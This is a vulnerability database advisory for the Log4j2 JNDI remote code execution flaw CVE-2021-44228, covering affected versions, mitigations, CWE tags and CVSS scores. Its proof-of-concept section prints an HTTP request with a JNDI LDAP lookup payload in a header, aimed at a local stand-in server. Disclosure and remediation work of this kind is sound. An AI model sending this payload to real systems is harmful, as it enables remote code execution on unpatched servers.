Home > Vulnerability Database > CVE-2021-44228

Mend.io Vulnerability Database

CVE-2021-44228

Date: December 9, 2021

Overview

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

Details

For further details and a quick illustration of the PoC, visit - https://www.whitesourcesoftware.com/resources/blog/log4j-vulnerability-cve-2021-44228/

PoC Details

Assume a web application that uses a vulnerable Log4j version to log user-controlled input, in this case - the "X-Api-Version" header, and an attacker-controlled server which serves malicious content, in this case - an LDAP server which serves a serialized object.
As an attacker, send an HTTP request to the vulnerable application with the call to the malicious server, as seen below.
When Log4j parses the payload it will connect to the malicious server and eventually execute it.

PoC Code

GET / HTTP/1.0
X-Api-Version: ${jndi:ldap://127.0.0.1:1389/o=reference}

Affected Environments

Log4j 2.0.0 through 2.14.1

Remediation

Since the December 14 publication of CVE-2021-45046, these are the updated remediation recommendations:
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability.
To mitigate, audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
Java 8 (or later) users should upgrade to release 2.16.0.
Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available.
Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.

Prevention

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations, due to this, it is recommended to update to version 2.16.0

Language: Java

Good to know:

10.0

Deserialization of Untrusted Data

CWE-502

Input Validation

CWE-20

Uncontrolled Resource Consumption ('Resource Exhaustion')

CWE-400

Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')

CWE-917

Upgrade Version

Upgrade to version org.apache.logging.log4j:log4j-core:2.3.1,2.12.2,2.15.0;org.ops4j.pax.logging:pax-logging-log4j2:1.11.10,2.0.11

Learn More

CVSS v3.1
CVSS v2

Base Score:	10.0
Attack Vector (AV):	Network
Attack Complexity (AC):	Low
Privileges Required (PR):	None
User Interaction (UI):	None
Scope (S):	Changed
Confidentiality (C):	High
Integrity (I):	High
Availability (A):	High

Base Score:	9.3
Access Vector (AV):	Network
Access Complexity (AC):	Medium
Authentication (AU):	None
Confidentiality (C):	Complete
Integrity (I):	Complete
Availability (A):	Complete
Additional information: